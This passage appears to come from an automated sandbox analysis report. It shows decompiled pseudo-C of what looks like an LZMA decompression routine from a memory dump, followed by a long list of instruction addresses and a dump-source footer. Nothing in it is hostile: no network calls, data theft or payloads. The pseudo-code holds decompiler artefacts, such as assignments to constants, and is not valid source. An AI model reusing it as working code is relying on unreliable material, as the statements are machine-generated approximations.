											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00406cc4
0x00406cce
0x00406c9d
0x00406ca6
0x00406cb3
0x00406cb6
0x00406ffa
0x00406ffa
0x00406ffd
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407049
0x00000000
0x00000000
0x0040704b
0x0040704f
0x004071fe
0x00407214
0x0040721c
0x00407223
0x00407225
0x0040722c
0x00407230
0x00407230
0x0040705b
0x00407062
0x0040706a
0x0040706d
0x00407070
0x00407070
0x00407076
0x00407076
0x00406812
0x00406812
0x00406812
0x0040681b
0x00000000
0x00000000
0x00406821
0x00000000
0x0040682c
0x00000000
0x00000000
0x00406835
0x00406838
0x0040683b
0x0040683f
0x00000000
0x00000000
0x00406845
0x00406848
0x0040684a
0x0040684b
0x0040684e
0x00406850
0x00406851
0x00406853
0x00406856
0x0040685b
0x00406860
0x00406869
0x0040687c
0x0040687f
0x0040688b
0x004068b3
0x004068b5
0x004068c3
0x004068c3
0x004068c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b7
0x004068b7
0x004068ba
0x004068bb
0x004068bb
0x00000000
0x004068b7
0x00406891
0x00406896
0x00406896
0x0040689f
0x004068a7
0x004068aa
0x00000000
0x004068b0
0x004068b0
0x00000000
0x004068b0
0x00000000
0x004068cd
0x004068cd
0x004068d1
0x0040717d
0x00000000
0x0040717d
0x004068da
0x004068ea
0x004068ed
0x004068f0
0x004068f0
0x004068f0
0x004068f3
0x004068f7
0x00000000
0x00000000
0x004068f9
0x004068ff
0x00406929
0x0040692f
0x00406936
0x00000000
0x00406936
0x00406905
0x00406908
0x0040690d
0x0040690d
0x00406918
0x00406920
0x00406923
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406968
0x0040696e
0x00406971
0x0040697e
0x00406986
0x00406ffa
0x00000000
0x00000000
0x0040693d
0x0040693d
0x00406941
0x0040718c
0x00000000
0x0040718c
0x0040694d
0x00406958
0x00406958
0x00406958
0x0040695b
0x0040695e
0x00406961
0x00406966
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407049
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040698e
0x00406990
0x00406993
0x00406a04
0x00406a07
0x00406a0a
0x00406a11
0x00406a1b
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406ffa
0x00406995
0x00406999
0x0040699c
0x0040699e
0x004069a1
0x004069a4
0x004069a6
0x004069a9
0x004069ab
0x004069b0
0x004069b3
0x004069b6
0x004069ba
0x004069c1
0x004069c4
0x004069cb
0x004069cf
0x004069d7
0x004069d7
0x004069d7
0x004069d1
0x004069d1
0x004069d1
0x004069c6
0x004069c6
0x004069c6
0x004069db
0x004069de
0x004069fc
0x004069fe
0x00000000
0x004069e0
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069eb
0x004069eb
0x004069eb
0x004069ee
0x004069f1
0x004069f3
0x004069f4
0x004069f7
0x00000000
0x004069f7
0x00000000
0x00406c2d
0x00406c31
0x00406c4f
0x00406c52
0x00406c59
0x00406c5c
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6a
0x00406c71
0x00406c72
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c7d
0x00406c82
0x00000000
0x00406c82
0x00406c33
0x00406c36
0x00406c39
0x00406c43
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00000000
0x00000000
0x00000000
0x00406cda
0x00406cde
0x00000000
0x00000000
0x00406ce4
0x00406ce8
0x00000000
0x00000000
0x00406cee
0x00406cf0
0x00406cf4
0x00406cf4
0x00406cf7
0x00406cfb
0x00000000
0x00000000
0x00406d4b
0x00406d4f
0x00406d56
0x00406d59
0x00406d5c
0x00406d66
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406ffa
0x00406d51
0x00000000
0x00000000
0x00406d72
0x00406d76
0x00406d7d
0x00406d80
0x00406d83
0x00406d78
0x00406d78
0x00406d78
0x00406d86
0x00406d89
0x00406d8c
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d95
0x00406d98
0x00406d9f
0x00406da4
0x00000000
0x00000000
0x00406e32
0x00406e32
0x00406e36
0x004071d4
0x00000000
0x004071d4
0x00406e3c
0x00406e3f
0x00406e42
0x00406e46
0x00406e49
0x00406e4f
0x00406e51
0x00406e51
0x00406e51
0x00406e54
0x00406e57
0x00000000
0x00000000
0x00406a27
0x00406a27
0x00406a2b
0x00407198
0x00000000
0x00407198
0x00406a31
0x00406a34
0x00406a37
0x00406a3b
0x00406a3e
0x00406a44
0x00406a46
0x00406a46
0x00406a46
0x00406a49
0x00406a4c
0x00406a4c
0x00406a4f
0x00406a52
0x00000000
0x00000000
0x00406a58
0x00406a5e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a75
0x00406a78
0x00406a7a
0x00406a80
0x00406a83
0x00406a86
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406aae
0x00406ab1
0x00406ab4
0x00406ab7
0x00406abe
0x00406ac2
0x00406ac4
0x00406ac8
0x00406a94
0x00406a94
0x00406a98
0x00406aa0
0x00406aa5
0x00406aa7
0x00406aa9
0x00406aa9
0x00406acb
0x00406ad2
0x00406ad5
0x00000000
0x00406adb
0x00000000
0x00406adb
0x00000000
0x00406ae0
0x00406ae0
0x00406ae4
0x004071a4
0x00000000
0x004071a4
0x00406aea
0x00406aed
0x00406af0
0x00406af4
0x00406af7
0x00406afd
0x00406aff
0x00406aff
0x00406aff
0x00406b02
0x00406b05
0x00406b05
0x00406b05
0x00406b0b
0x00000000
0x00000000
0x00406b0d
0x00406b10
0x00406b13
0x00406b16
0x00406b19
0x00406b1c
0x00406b1f
0x00406b22
0x00406b25
0x00406b28
0x00406b2b
0x00406b43
0x00406b46
0x00406b49
0x00406b4c
0x00406b4c
0x00406b4f
0x00406b53
0x00406b55
0x00406b2d
0x00406b2d
0x00406b35
0x00406b3a
0x00406b3c
0x00406b3e
0x00406b3e
0x00406b58
0x00406b5f
0x00406b62
0x00000000
0x00406b64
0x00000000
0x00406b64
0x00406b62
0x00406b69
0x00406b69
0x00406b69
0x00406b69
0x00000000
0x00000000
0x00406ba4
0x00406ba4
0x00406ba8
0x004071b0
0x00000000
0x004071b0
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb8
0x00406bbb
0x00406bc1
0x00406bc3
0x00406bc3
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bcf
0x00406b6d
0x00406b6d
0x00406b70
0x00000000
0x00406b70
0x00406bd1
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bef
0x00406c07
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c17
0x00406c19
0x00406bf1
0x00406bf1
0x00406bf9
0x00406bfe
0x00406c00
0x00406c02
0x00406c02
0x00406c1c
0x00406c23
0x00406c26
0x00000000
0x00406c28
0x00000000
0x00406c28
0x00000000
0x00406eb5
0x00406eb5
0x00406eb9
0x004071e0
0x00000000
0x004071e0
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec9
0x00406ecc
0x00406ed2
0x00406ed4
0x00406ed4
0x00406ed4
0x00406ed7
0x00000000
0x00000000
0x00406c85
0x00406c85
0x00406c88
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00000000
0x00406fc4
0x00406fc8
0x00406fea
0x00406fed
0x00406ff7
0x00406ffa
0x00406ffa
0x00000000
0x00406ffa
0x00406ffa
0x00406fca
0x00406fcd
0x00406fd1
0x00406fd4
0x00406fd4
0x00406fd7
0x00000000
0x00000000
0x00407081
0x00407085
0x004070a3
0x004070a3
0x004070a3
0x004070aa
0x004070b1
0x004070b8
0x004070b8
0x00000000
0x004070b8
0x00407087
0x0040708a
0x0040708d
0x00407090
0x00407097
0x00406fdb
0x00406fdb
0x00406fde
0x00000000
0x00000000
0x00407172
0x00407175
0x00407076
0x00000000
0x00000000
0x00406dac
0x00406dae
0x00406db5
0x00406db6
0x00406db8
0x00406dbb
0x00000000
0x00000000
0x00406dc3
0x00406dc6
0x00406dc9
0x00406dcb
0x00406dcd
0x00406dcd
0x00406dce
0x00406dd1
0x00406dd8
0x00406ddb
0x00406de9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c2
0x004070c9
0x00000000
0x00000000
0x004070ce
0x004070ce
0x004070d2
0x0040720a
0x00000000
0x0040720a
0x004070d8
0x004070db
0x004070de
0x004070e2
0x004070e5
0x004070eb
0x004070ed
0x004070ed
0x004070ed
0x004070f0
0x004070f3
0x004070f3
0x004070f3
0x004070f3
0x004070f6
0x004070f6
0x004070fa
0x0040715a
0x0040715d
0x00407162
0x00407163
0x00407165
0x00407167
0x0040716a
0x00407076
0x00407076
0x00000000
0x0040707c
0x00407076
0x004070fc
0x00407102
0x00407105
0x00407108
0x0040710b
0x0040710e
0x00407111
0x00407114
0x00407117
0x0040711a
0x0040711d
0x00407136
0x00407139
0x0040713c
0x0040713f
0x00407143
0x00407145
0x00407145
0x00407146
0x00407149
0x0040711f
0x0040711f
0x00407127
0x0040712c
0x0040712e
0x00407131
0x00407131
0x0040714c
0x00407153
0x00000000
0x00407155
0x00000000
0x00407155
0x00000000
0x00406df1
0x00406df4
0x00406e2a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5d
0x00406f5d
0x00406f60
0x00406f62
0x004071ec
0x00000000
0x004071ec
0x00406f68
0x00406f6b
0x00000000
0x00000000
0x00406f71
0x00406f75
0x00406f78
0x00406f78
0x00406f78
0x00000000
0x00406f78
0x00406df6
0x00406df8
0x00406dfa
0x00406dfc
0x00406dff
0x00406e00
0x00406e02
0x00406e04
0x00406e07
0x00406e0a
0x00406e20
0x00406e25
0x00406e5d
0x00406e5d
0x00406e61
0x00406e8d
0x00406e8f
0x00406e96
0x00406e99
0x00406e9c
0x00406e9c
0x00406ea1
0x00406ea1
0x00406ea3
0x00406ea6
0x00406ead
0x00406eb0
0x00406edd
0x00406edd
0x00406ee0
0x00406ee3
0x00406f57
0x00406f57
0x00406f57
0x00000000
0x00406f57
0x00406ee5
0x00406eeb
0x00406eee
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f03
0x00406f06
0x00406f1f
0x00406f21
0x00406f24
0x00406f25
0x00406f28
0x00406f2a
0x00406f2d
0x00406f2f
0x00406f31
0x00406f34
0x00406f36
0x00406f39
0x00406f3d
0x00406f3f
0x00406f3f
0x00406f40
0x00406f43
0x00406f46
0x00406f08
0x00406f08
0x00406f10
0x00406f15
0x00406f17
0x00406f1a
0x00406f1a
0x00406f49
0x00406f50
0x00406eda
0x00406eda
0x00406eda
0x00406eda
0x00000000
0x00406f52
0x00000000
0x00406f52
0x00406f50
0x00406e63
0x00406e66
0x00406e68
0x00406e6b
0x00406e6e
0x00406e71
0x00406e73
0x00406e76
0x00406e79
0x00406e79
0x00406e7c
0x00406e7c
0x00406e7f
0x00406e86
0x00406e5a
0x00406e5a
0x00406e5a
0x00406e5a
0x00000000
0x00406e88
0x00000000
0x00406e88
0x00406e86
0x00406e0c
0x00406e0f
0x00406e11
0x00406e14
0x00000000
0x00000000
0x00406b73
0x00406b73
0x00406b77
0x004071bc
0x00000000
0x004071bc
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8c
0x00406b8f
0x00406b91
0x00406b94
0x00406b97
0x00406b9a
0x00406b9c
0x00406b9c
0x00406b9c
0x00000000
0x00000000
0x00406cfe
0x00406cfe
0x00406d02
0x004071c8
0x00000000
0x004071c8
0x00406d08
0x00406d0b
0x00406d0e
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d26
0x00406d28
0x00406d28
0x00406d28
0x00406d2b
0x00406d2e
0x00406d31
0x00406d34
0x00406d34
0x00406d34
0x00406d37
0x00406d39
0x00406d39
0x00000000
0x00000000
0x00406f7b
0x00406f7b
0x00406f7b
0x00406f7f
0x00000000
0x00000000
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f90
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9c
0x00406f9f
0x00406fa2
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb8
0x00406fba
0x00406fbd
0x00000000
0x00406fbf
0x00406d3c
0x00406d3c
0x00000000
0x00406d3c
0x00406fbd
0x004071f2
0x00000000
0x00000000
0x00406821
0x00407229
0x00407229
0x00000000
0x00407229
0x00407076
0x00406ffd
0x00406ffa

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
